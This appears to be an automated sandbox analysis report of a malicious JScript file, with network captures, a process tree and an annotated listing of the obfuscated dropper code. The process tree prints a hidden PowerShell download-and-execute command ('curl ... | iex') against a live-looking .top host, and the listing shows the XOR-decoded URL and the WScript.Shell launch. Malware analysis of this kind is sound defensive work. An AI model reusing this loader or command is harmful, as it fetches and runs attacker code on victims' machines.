                                                                                                      Dec 17, 2024 18:22:19.738797903 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.738871098 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.742445946 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.742501974 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.742552996 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.750721931 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.750777960 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.754358053 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.754543066 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.754597902 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.760370970 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.767534971 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.767594099 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.767960072 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.771888018 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.771950006 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.781075954 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.781146049 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.781207085 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.785321951 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.794646025 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.794697046 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.794765949 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.799029112 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.799084902 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.808332920 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.808402061 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.808470964 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.812654972 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.823280096 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.823329926 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.858612061 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.858628988 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.858772039 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.862749100 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.862792015 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.862847090 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.871191978 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.919075012 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.930499077 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.930512905 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.930612087 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.931957006 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.931972980 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.932039022 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.936971903 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.936988115 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.937041044 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.941853046 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.943130970 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.943145990 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.943198919 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.948000908 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.948064089 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.954592943 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.954607964 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.954663038 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.957108021 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.968312979 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.968328953 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.968388081 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.970659971 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.970731974 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.980637074 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.980652094 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.980726957 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:24.698745012 CET4973180192.168.2.445.61.137.71
                                                                                                      Dec 17, 2024 18:22:24.698853970 CET4973380192.168.2.4172.217.19.228
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 17, 2024 18:22:15.332173109 CET5545753192.168.2.41.1.1.1
                                                                                                      Dec 17, 2024 18:22:15.729593992 CET53554571.1.1.1192.168.2.4
                                                                                                      Dec 17, 2024 18:22:17.493345976 CET6149253192.168.2.41.1.1.1
                                                                                                      Dec 17, 2024 18:22:17.630178928 CET53614921.1.1.1192.168.2.4
                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Dec 17, 2024 18:22:15.332173109 CET192.168.2.41.1.1.10x6f52Standard query (0)mbuzy3yvzw3r.topA (IP address)IN (0x0001)false
                                                                                                      Dec 17, 2024 18:22:17.493345976 CET192.168.2.41.1.1.10x8755Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Dec 17, 2024 18:22:15.729593992 CET1.1.1.1192.168.2.40x6f52No error (0)mbuzy3yvzw3r.top45.61.137.71A (IP address)IN (0x0001)false
                                                                                                      Dec 17, 2024 18:22:17.630178928 CET1.1.1.1192.168.2.40x8755No error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                      • mbuzy3yvzw3r.top
                                                                                                      • www.google.com
                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.44973145.61.137.71805348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 17, 2024 18:22:15.971632957 CET176OUTGET /1.php?s=mints13 HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                      Host: mbuzy3yvzw3r.top
                                                                                                      Connection: Keep-Alive
                                                                                                      Dec 17, 2024 18:22:17.492166042 CET166INHTTP/1.1 302 Found
                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                      Date: Tue, 17 Dec 2024 17:22:17 GMT
                                                                                                      Content-Length: 0
                                                                                                      Connection: keep-alive
                                                                                                      Location: http://www.google.com


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.449733172.217.19.228805348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 17, 2024 18:22:17.753047943 CET159OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                      Host: www.google.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Dec 17, 2024 18:22:19.546190023 CET1236INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 17:22:19 GMT
                                                                                                      Expires: -1
                                                                                                      Cache-Control: private, max-age=0
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-WuTwp9r6l1635P90zR67pg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                      Server: gws
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      Set-Cookie: AEC=AZ6Zc-WA96HEoDBej_NYA3DP1O6UYStIk8Wfg-SWX4ZvGs_gIXi7EDDOvU4; expires=Sun, 15-Jun-2025 17:22:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                      Set-Cookie: NID=520=RCNBrUfHBYArEAdDgpI-BkumEyHOHtKWLZYuy4_-ZF6YCqXyu1vqyzodd5ME0q4x2MNtkjcBpLoV2M5GKb_nm3RnNnmtihIrRLHR13XzlC73hKQfpq2RnXKjJPGjQQVdH1mXsHSWGUJs_XdcNAqaNqGH6BCmy7kauwDi05GTuJs1cvPXh0Dlh-XtPpGCxf0YPa4zAH2E; expires=Wed, 18-Jun-2025 17:22:19 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                      Accept-Ranges: none
                                                                                                      Vary: Accept-Encoding
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Data Raw: 33 39 36 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20
                                                                                                      Data Ascii: 3969<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images,
                                                                                                      Dec 17, 2024 18:22:19.546303988 CET1236INData Raw: 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f
                                                                                                      Data Ascii: videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/lo
                                                                                                      Dec 17, 2024 18:22:19.546478033 CET1236INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 67 3d 7b 6b 45 49 3a 27 53 37 4e 68 5a 39 31 4e 34 2d 48 6a 34 51 2d 35 32 66 69 51 43 51 27 2c 6b 45 58 50 49 3a 27 30 2c 33 37 30 30 33 33 31 2c 31 30 35 33 2c 35 33 38 36 36 31 2c 32 38 37 32
                                                                                                      Data Ascii: (function(){var _g={kEI:'S7NhZ91N4-Hj4Q-52fiQCQ',kEXPI:'0,3700331,1053,538661,2872,2891,43028,30022,16105,239271,105525,45786,9779,99404,3801,2412,50869,7734,19360,19988,1632,29279,15664,11419,5213674,583,239,5992032,2842485,5,91,1,1,1,1,16,62
                                                                                                      Dec 17, 2024 18:22:19.546494961 CET1236INData Raw: 33 37 35 2c 31 32 33 2c 37 30 37 2c 34 34 38 2c 33 32 2c 31 31 30 2c 36 30 33 2c 34 37 34 2c 32 32 39 2c 39 33 2c 33 36 32 2c 34 39 33 2c 33 34 30 2c 37 35 32 2c 32 30 31 2c 34 35 31 2c 31 31 35 33 2c 33 36 30 2c 32 31 2c 38 38 33 2c 34 39 35 2c
                                                                                                      Data Ascii: 375,123,707,448,32,110,603,474,229,93,362,493,340,752,201,451,1153,360,21,883,495,1109,16,1741,21350070,37198,18,2004,1480,866,5240,40,160,553,1664,110,8,2065,3,1207,598,12,187,5985837,2038088',kBL:'MqhX',kOPI:89978449};(function(){var a;((a=w
                                                                                                      Dec 17, 2024 18:22:19.546912909 CET704INData Raw: 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20
                                                                                                      Data Ascii: tion(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).call(this);(fu
                                                                                                      Dec 17, 2024 18:22:19.546928883 CET1236INData Raw: 73 68 28 5b 61 2c 62 5d 29 7d 29 3b 67 6f 6f 67 6c 65 2e 62 78 3d 21 31 3b 76 61 72 20 6b 3b 28 6b 3d 67 6f 6f 67 6c 65 29 2e 6c 78 7c 7c 28 6b 2e 6c 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 3b 76 61 72 20 6c 3d 5b 5d 2c 6d 3b 28 6d 3d 67 6f
                                                                                                      Data Ascii: sh([a,b])});google.bx=!1;var k;(k=google).lx||(k.lx=function(){});var l=[],m;(m=google).fce||(m.fce=function(a,b,c,n){l.push([a,b,c,n])});google.qce=l;}).call(this);google.f={};(function(){document.documentElement.addEventListener("submit",fu
                                                                                                      Dec 17, 2024 18:22:19.546945095 CET1236INData Raw: 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 7a 2d 69 6e 64 65 78 3a 39 39 30 7d 23 67 62 78 33 7b 6c 65 66 74 3a 30 7d 23 67 62 78 34 7b 72 69 67 68 74 3a 30 7d 23 67 62 62 7b 70 6f 73 69
                                                                                                      Data Ascii: osition:absolute;top:0;width:100%;z-index:990}#gbx3{left:0}#gbx4{right:0}#gbb{position:relative}#gbbw{left:0;position:absolute;top:30px;width:100%}.gbtcb{position:absolute;visibility:hidden}#gbz .gbtcb{right:0}#gbg .gbtcb{left:0}.gbxx{display:
                                                                                                      Dec 17, 2024 18:22:19.547524929 CET1236INData Raw: 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 68 65 69 67 68 74 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 77 69 64 74 68 3a 30 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a
                                                                                                      Data Ascii: -box;display:inline-block;font-size:0;height:0;line-height:0;width:0;border-width:3px 3px 0;padding-top:1px;left:4px}#gbztms1,#gbi4m1,#gbi4s,#gbi4t{zoom:1}.gbtc,.gbmc,.gbmcc{display:block;list-style:none;margin:0;padding:0}.gbmc{background:#ff
                                                                                                      Dec 17, 2024 18:22:19.547539949 CET1236INData Raw: 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f
                                                                                                      Data Ascii: //ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:-27px -22px;border:0;font-size:0;padding:29px 0 0;*padding:27px 0 0;width:1px}.gbzt:hover,.gbzt:focus,.gbgt-hvr,
                                                                                                      Dec 17, 2024 18:22:19.547555923 CET1236INData Raw: 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a
                                                                                                      Data Ascii: !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:0 0;display:block;font-size:0;
                                                                                                      Dec 17, 2024 18:22:19.667689085 CET1236INData Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 6d 68 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64
                                                                                                      Data Ascii: font-weight:bold}.gbmh{border-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-b


                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:12:21:59
                                                                                                      Start date:17/12/2024
                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\7hCWDvuinz.js"
                                                                                                      Imagebase:0x7ff76fef0000
                                                                                                      File size:170'496 bytes
                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:1
                                                                                                      Start time:12:22:11
                                                                                                      Start date:17/12/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c "curl -useb 'http://mbuzy3yvzw3r.top/1.php?s=mints13' | iex"
                                                                                                      Imagebase:0x7ff788560000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:12:22:11
                                                                                                      Start date:17/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Call Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      callgraph clusterC0 clusterC2C0 clusterC4C0 clusterC6C4 clusterC8C4 clusterC10C4 clusterC12C0 clusterC14C0 clusterC16C0 clusterC18C16 clusterC20C16 clusterC22C0 clusterC24C0 clusterC26C0 clusterC28C26 clusterC30C26 clusterC32C0 clusterC34C0 clusterC36C0 clusterC38C0 E1C0 entry:C0 F3C2 Sleep E1C0->F3C2 F5C4 hKho2Me14ZuxGIoWVi3HsOc E1C0->F5C4 F13C12 CreateObject E1C0->F13C12 F15C14 apply E1C0->F15C14 F17C16 E1C0->F17C16 F25C24 Run E1C0->F25C24 F33C32 fromCharCode E1C0->F33C32 F35C34 parseInt E1C0->F35C34 F37C36 CreateObject E1C0->F37C36 F39C38 DeleteFile E1C0->F39C38 F7C6 split F5C4->F7C6 F9C8 push F5C4->F9C8 F11C10 fromCharCode F5C4->F11C10 F19C18 push F17C16->F19C18 F21C20 parseInt F17C16->F21C20 F23C22 IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qbgkldfjnr F27C26 F27C26->F23C22 F29C28 fromCharCode F27C26->F29C28 F31C30 parseInt F27C26->F31C30

                                                                                                      Script:

                                                                                                      Code
                                                                                                      0
                                                                                                      WScript.Sleep ( 11000 );
                                                                                                      • Windows Script Host.Sleep(11000) ➔ undefined
                                                                                                      1
                                                                                                      var cyslIycXmAJ7ZK4YVYogwtrcQK5gXghxwpi0PBYzpfcg8VN4BClLvWv3ZEVJTq98xFa7jvjOL6MN6lVIAAFrgG = "72,84,84,80,26,15,15,77,66,85,90,89,19,89,86,90,87,19,82,14,84,79,80,15,17,14,80,72,80,31,83,29,77,73,78,84,83,17,19";
                                                                                                        2
                                                                                                        function hKho2Me14ZuxGIoWVi3HsOc() {
                                                                                                        • hKho2Me14ZuxGIoWVi3HsOc() ➔ "http://mbuzy3yvzw3r.top/1.php?s=mints13"
                                                                                                        3
                                                                                                        var script1 = cyslIycXmAJ7ZK4YVYogwtrcQK5gXghxwpi0PBYzpfcg8VN4BClLvWv3ZEVJTq98xFa7jvjOL6MN6lVIAAFrgG.split ( ',' );
                                                                                                        • "72,84,84,80,26,15,15,77,66,85,90,89,19,89,86,90,87,19,82,14,84,79,80,15,17,14,80,72,80,31,83,29,77,73,78,84,83,17,19".split(",") ➔ 72,84,84,80,26,15,15,77,66,85,90,89,19,89,86,90,87,19,82,14,84,79,80,15,17,14,80,72,80,31,83,29,77,73,78,84,83,17,19
                                                                                                        4
                                                                                                        var hkL4a19GBcqpFAE9i4Jsj8KbFpSP8W6c0LDQMmXRjsLIZOLhKho2Me14ZuxGIoWVi3HsOc = [];
                                                                                                          5
                                                                                                          var cyslIycXmAJ7ZK4YVYogwtrcQK5gXghxwpi0PBYzpfcg8VN4BClLvWv3ZEVJTq98xFa7jvjOL6MN6lVIAAFrgGhkL4a19GBcqpFAE9i4Jsj8KbFpSP8W6c0LDQMmXRjsLIZOL = '';
                                                                                                            6
                                                                                                            for ( var hkL4a19GBcqpFAE9i4Jsj8KbFpSP8W6c0LDQMmXRjsLIZOLIJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qb = 0 ; hkL4a19GBcqpFAE9i4Jsj8KbFpSP8W6c0LDQMmXRjsLIZOLIJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qb < script1.length ; hkL4a19GBcqpFAE9i4Jsj8KbFpSP8W6c0LDQMmXRjsLIZOLIJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qb ++ )
                                                                                                              7
                                                                                                              {
                                                                                                                8
                                                                                                                hkL4a19GBcqpFAE9i4Jsj8KbFpSP8W6c0LDQMmXRjsLIZOLhKho2Me14ZuxGIoWVi3HsOc.push ( String.fromCharCode ( script1[hkL4a19GBcqpFAE9i4Jsj8KbFpSP8W6c0LDQMmXRjsLIZOLIJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qb] ^ 5 * 6 + 0.25 * 8 ) );
                                                                                                                  9
                                                                                                                  }
                                                                                                                    10
                                                                                                                    for ( var hkL4a19GBcqpFAE9i4Jsj8KbFpSP8W6c0LDQMmXRjsLIZOLIJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qb = 0 ; hkL4a19GBcqpFAE9i4Jsj8KbFpSP8W6c0LDQMmXRjsLIZOLIJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qb < hkL4a19GBcqpFAE9i4Jsj8KbFpSP8W6c0LDQMmXRjsLIZOLhKho2Me14ZuxGIoWVi3HsOc.length ; hkL4a19GBcqpFAE9i4Jsj8KbFpSP8W6c0LDQMmXRjsLIZOLIJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qb ++ )
                                                                                                                      11
                                                                                                                      {
                                                                                                                        12
                                                                                                                        cyslIycXmAJ7ZK4YVYogwtrcQK5gXghxwpi0PBYzpfcg8VN4BClLvWv3ZEVJTq98xFa7jvjOL6MN6lVIAAFrgGhkL4a19GBcqpFAE9i4Jsj8KbFpSP8W6c0LDQMmXRjsLIZOL += hkL4a19GBcqpFAE9i4Jsj8KbFpSP8W6c0LDQMmXRjsLIZOLhKho2Me14ZuxGIoWVi3HsOc[hkL4a19GBcqpFAE9i4Jsj8KbFpSP8W6c0LDQMmXRjsLIZOLIJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qb];
                                                                                                                          13
                                                                                                                          }
                                                                                                                            14
                                                                                                                            return cyslIycXmAJ7ZK4YVYogwtrcQK5gXghxwpi0PBYzpfcg8VN4BClLvWv3ZEVJTq98xFa7jvjOL6MN6lVIAAFrgGhkL4a19GBcqpFAE9i4Jsj8KbFpSP8W6c0LDQMmXRjsLIZOL;
                                                                                                                              15
                                                                                                                              }
                                                                                                                                16
                                                                                                                                var IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qb = [ "10b2", "10b6", "1086", "1097", "108c", "1095", "1091", "10cb", "10b6", "108d", "1080", "1089", "1089" ];
                                                                                                                                  17
                                                                                                                                  var qSYKFGcvTwdXx2khH9916Et8A1R9zrCb2kfgDbjJxvfv8mJA3zKcqYqHC = WScript.CreateObject ( String.fromCharCode.apply ( null,
                                                                                                                                  • function fromCharCode().apply(null,87,83,99,114,105,112,116,46,83,104,101,108,108) ➔ "WScript.Shell"
                                                                                                                                  • Windows Script Host.CreateObject("WScript.Shell") ➔
                                                                                                                                  18
                                                                                                                                  function () {
                                                                                                                                  • () ➔ 87,83,99,114,105,112,116,46,83,104,101,108,108
                                                                                                                                  • () ➔ 87,83,99,114,105,112,116,46,83,104,101,108,108
                                                                                                                                  19
                                                                                                                                  var eVhTynlq6eEo656QsR0U0HsHkPMHeoSF1dSpR = 0;
                                                                                                                                    20
                                                                                                                                    var hkL4a19GBcqpFAE9i4Jsj8KbFpSP8W6c0LDQMmXRjsLIZOL = [];
                                                                                                                                      21
                                                                                                                                      while (eVhTynlq6eEo656QsR0U0HsHkPMHeoSF1dSpR < IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qb.length )
                                                                                                                                        22
                                                                                                                                        {
                                                                                                                                          23
                                                                                                                                          hkL4a19GBcqpFAE9i4Jsj8KbFpSP8W6c0LDQMmXRjsLIZOL.push ( parseInt ( IJjBkCbHTYWG8u5eTtNDxMDVj1GNXH2URmdZfEIoCQ8eMDEgWb2eHU3ATtlFGQvlPyL2monae5Qb[eVhTynlq6eEo656QsR0U0HsHkPMHeoSF1dSpR], 2 * 4 * 2 ) ^ ( 500 * 8 + 50 * 6 + 5 * 5 ) );
                                                                                                                                          • parseInt("10b2",16) ➔ 4274
                                                                                                                                          • parseInt("10b6",16) ➔ 4278
